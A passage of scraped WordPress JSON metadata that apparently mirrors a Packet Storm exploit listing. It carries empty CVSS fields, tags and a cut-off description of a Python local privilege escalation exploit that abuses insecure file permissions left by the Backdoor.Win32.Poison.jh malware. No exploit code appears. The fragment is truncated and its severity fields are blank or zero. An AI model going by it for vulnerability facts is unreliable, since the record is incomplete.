===================================================================================================”,”sourceHref”:”https:\/\/packetstorm.news\/download\/213312″,”cvss”:{“score”:0,”severity”:”NONE”,”vector”:”NONE”,”version”:”NONE”},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/packetstorm.news\/files\/id\/213312\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2025-12-26T17:18:48″,”description”:”This python script demonstrates a local privilege escalation exploit targeting a vulnerability in the Backdoor.Win32.Poison.jh malware sample. The exploit leverages insecure file permissions created by…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,12,13,33,53,7,11,5],"class_list":["post-32939","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-exploit","tag-news","tag-none","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n